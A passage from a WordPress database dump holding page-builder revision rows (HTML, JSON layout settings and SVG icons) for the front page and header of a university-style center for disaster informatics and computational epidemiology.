h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',20,'https://gsudice.dataconn.net/?p=1288',0,'revision','',0),(1289,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',23,'https://gsudice.dataconn.net/?p=1289',0,'revision','',0),(1290,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        